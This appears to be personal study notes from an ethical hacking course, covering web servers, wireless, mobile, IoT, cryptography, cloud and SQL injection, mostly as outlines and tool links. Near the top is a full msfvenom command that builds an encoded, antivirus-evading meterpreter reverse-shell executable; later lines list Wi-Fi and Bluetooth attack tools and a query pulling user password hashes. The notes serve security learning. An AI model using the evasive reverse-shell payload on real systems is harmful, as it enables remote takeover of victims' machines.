https://securityonionsolutions.com/

Evasion Techniques

Msfvenom

┌──(kali㉿kali)-[~]

└─$ msfvenom --list encoders  

Msfvenom -p windows/meterpreter/reverse_tcp  --platform windows -a x86 LHOST=10.0.2.15 LPORT=4444 -e x86/shikata_ga_nai -i 100 -f exe -o venom.exe

Andromeda's Five Star Custom Packer – Hackers' Tactics Analyzed

Packer-based malware is malware which is modified in the runtime memory using different and sophisticated compression techniques. Such malware is hard to detect by known malware scanners and anti-virus solutions. In addition, it is a cheap way for hackers to recreate new signatures for the same malware on the fly simply by changing the encryption/packing method. Packers themselves are not malware; attackers use this tactic to obfuscate the code’s real intention.

https://blog.morphisec.com/andromeda-tactics-analyzed

***********************************************************************************************************

Chapter 13:  Ethical Hacking: Hacking Web Servers and Web Applications, By Malcolm Shore

Introduction to WEB Servers 

Return Code from web servers

• 200 - processed OK

• 400 - bad request

• 403 - unauthorized

• 404 - not found

• 500 - internal server error 

Tools

http://websocketd.com/

Google QUIC

burpsuite | Kali Linux Tools

https://www.kali.org/tools/burpsuite/

Testing vulnerable website

http://zero.webappsecurity.com/

OWASP WebGoat - Learn the hack - Stop the attack

https://owasp.org/www-project-webgoat/

Fingerprinting 

whatweb

┌──(kali㉿kali)-[~]

└─$ whatweb http://zero.webappsecurity.com

http://zero.webappsecurity.com [200 OK] Apache, Bootstrap, Content-Language[en-US], Country[UNITED STATES][US], HTML5, HTTPServer[Apache-Coyote/1.1], IP, JQuery[1.8.2], Script[text/javascript], Title[Zero - Personal Banking - Loans - Credit Cards], UncommonHeaders[access-control-allow-origin], X-UA-Compatible[IE=Edge]

┌──(kali㉿kali)-[~]

└─$ whatweb -l | more   

Web Security Dojo

A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo

https://www.mavensecurity.com/resources/web-security-dojo

***********************************************************************************************************

Chapter 14: Ethical Hacking: Wireless Networks, by Malcolm Shore

Wi-Fi Networks

Speed Standards

Wireless security

• Network key

• Internet login

• MAC filtering

• Encryption- WEP, WPA, and WPA2

• Connection -WPS

Signal aspects of wireless

• Performance in dBi is against a benchmark 

•  Gain is expressed in units of dBi, decibels isotropic, and the higher the decibels, the more powerful the antenna, and the more reliable the communication is. Sometimes performance will be expressed as dBm, which is pure signal power. dBm are related to milliwatts through the equation dBm equals 10 times log to the 10 milliwatts. 

•  When transmitting, a positive number represents better performance, or gain, from the benchmark, and a negative number means lower performance, or loss. 1,000 milliwatts, or 30 dBm, is rated to be a good transmitter.

•  For reception, the opposite is true. We want to be able to receive weaker signals, and a good antenna should be able to operate down to about minus 90 dBm. 

Yagi antenna or fishbone antenna

Parabolic antenna

wifite | Kali Linux Tools

https://www.kali.org/tools/wifite/

reaver | Kali Linux Tools

https://www.kali.org/tools/reaver/

• Reaver 

• Wash

Airmon-ng

https://www.aircrack-ng.org/doku.php?id=airmon-ng

Dragonblood

https://wpa3.mathyvanhoef.com/

Wifi Pineapple:

WiFi Pineapple - Hak5

fern

fern-wifi-cracker | Kali Linux Tools

https://www.kali.org/tools/fern-wifi-cracker/

MetaGeek | inSSIDer - Defeat Slow Wi-Fi

https://www.metageek.com/inssider/

fern-wifi-cracker | Kali Linux Tools

https://www.kali.org/tools/fern-wifi-cracker/

Bluetooth

• Serial Port Profile SPP

• Human interface Device Profile HID

• Hands-Free Profile HFP

• Advanced Audio Distribution Profile A2DP

• Audio/Video Remote control Profile AVRCP

┌──(kali㉿kali)-[~]

└─$ lsusb

┌──(kali㉿kali)-[~]

└─$ sudo bluelog -l

┌──(kali㉿kali)-[~]

└─$ btscanner 

┌──(kali㉿kali)-[~]

└─$ fang -h

***********************************************************************************************************

Chapter 15: Ethical Hacking: Mobile Devices and Platforms, by Malcolm Shore

Mobile technology

• OWASP Mobile Security methodologies 

• Effective testing

• Static analysis

• App source code

• Reverse Engg.

• Clone runtime environment

• Identify

• All N/w interfaces

• N/W protocols 

• Complements interactions

• Data access

• App interfaces

• Encryption

• Pinning

• Certificate

• Public key

• 
  

• Dynamic analysis

• Changes to device storage

• Info transmitted

• Web app testing

• 
  

• Forensic analysis

• Virtualization

OWASP Mobile Security Testing Guide

OWASP flagship project provides a security standard for mobile apps (OWASP MASVS) and a comprehensive testing guide (OWASP MSTG) that covers the processes, techniques, and tools used during a mobile app security test, as well as an exhaustive set of test cases that enables testers to deliver consistent and complete results.

https://owasp.org/www-project-mobile-security-testing-guide/

Android

• Builds on the Linux security model 

• “*.dex” extensions are Dalvik executable files.

Download Android Studio & App Tools

https://developer.android.com/studio

Apktool - A tool for reverse engineering 3rd party, closed, binary Android apps.

https://ibotpeaches.github.io/Apktool/

Apk Files

https://www.apkfiles.com/

dex2jar download | SourceForge.net

https://sourceforge.net/projects/dex2jar/

dex2jar | Kali Linux Tools

https://www.kali.org/tools/dex2jar/

GitHub - skylot/jadx: Dex to Java decompiler

https://github.com/skylot/jadx

OWASP Security Shepherd

The OWASP Security Shepherd Project is a web and mobile application security training platform. Security Shepherd has been designed to foster and improve security awareness among a varied skill-set demographic. The aim of this project is to take AppSec novices or experienced engineers and sharpen their penetration testing skill set to security expert status.

https://owasp.org/www-project-security-shepherd/

***********************************************************************************************************

Chapter 16: Ethical Hacking: Hacking IoT Devices, by Luciano Ferrari

Internet of Things 

IoT Attacks 

• Lack of security

• Vulnerable interfaces

• Lack of firmware updates

OWASP Internet of Things

https://owasp.org/www-project-internet-of-things/

https://wiki.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Top_10

Type of attacks

• DDoS

• Rolling code attack

• BlueBorne attack

• Jamming attacks

• Backdoor

• Sybil

• Side channel 

Hacking Methodology

• Information gathering

• Vulnerability scanning

• Launch attack

• Gain access

• Maintain access 

***********************************************************************************************************

Chapter 17 :Ethical Hacking: Cryptography, by Stephanie Domas

Cryptography

• Symmetric Cryptography 

• Asymmetric

• Hashing 

Ciphers

• Plaintext 

• Block

• Stream

DES - Data Encryption standard 

• Replaced by AES

ADES - Advanced Encryption Standard 

RC - Rivest Cipher

• Symmetric

• Designed by Ron Rivest

• RC4

• RC5

• RC6

ECC - Elliptical Curve Cryptography

Diffie-Hellman

Hybrid Cipher

• Symmetric & Asymmetric combined together 

Hasing

• One way function

• Used in passwords

MD5 - Message Digest

• 128-bit o/p

SHA - Secure hashing Algorithm

• 160-bit o/p

Digital Certificates

• Authorized Agency Verification 

• CA - Certificate authority verification

• Digital Certificate X.509

• Version

• Serial no

• Algorithm ID

• Issuer

• Validity

DSA - Digital Signature Algorithm 

PKI - Public Key Infrastructure

• Certificate management system

• Digital certificate 

• CRL - certification revocation list

• CA - certificate authority  

• RA registration authority 

• Enduser 

New  Secure Protocols

• S/MIME - Secure MIME - added digital signature, public key encryption to emails

• PGP - Pretty good privacy - similar to PKI

• SSH - secure shell - encrypted channels for remote command for a system.

Real world exploits

• Distributed.net 

• Electronic Frontier Foundation EFF

• Electronic Frontier Foundation

• https://www.eff.org

• HEARTbleed 

• https://heartbleed.com/

• Poodlebleed "Padding Oracle On Downgraded Legacy Encryption"

• DROWN - Decrypting RSA with Obsolete and Weakened eNcryption

• https://drownattack.com/

• FREAK ("Factoring RSA Export Keys")

***********************************************************************************************************

Chapter 18: Ethical Hacking: Cloud Computing, by Daniel Lachance

Cloud Overview

• XaaS

• SaaS

• PaaS

• IaaS

Cloud identity Management 

• MFA Multi Factor Authentication 

• RBAC Role-Based Access Control

Cloud High Availability

• Business Continuity and Risk Management

• Identify assets

• Identify assets threats

• Identify threat likelihood

• Data Replication 

• Application Resiliency 

GDPR General Data Protection Regulation 

PCI DSS - Payment Card Industry Data Security 

***********************************************************************************************************

Chapter 19: Ethical Hacking: SQL Injection, by Malcolm Shore

Testing SQL Injection

OWASP Security Shepherd

-https://owasp.org/www-project-security-shepherd/

┌──(kali㉿kali)-[~]

└─$ service mysql start  

┌──(kali㉿kali)-[~]

└─$ sudo mysql -u root -p 

MariaDB [(none)]> show databases;

MariaDB [(none)]> use information_schema;

MariaDB [information_schema]> show tables;

MariaDB [information_schema]> use mysql

MariaDB [mysql]> show database; 

MariaDB [mysql]> show tables;

MariaDB [mysql]> show columns from user;

MariaDB [mysql]> select user,password from user;

***********************************************************************************************************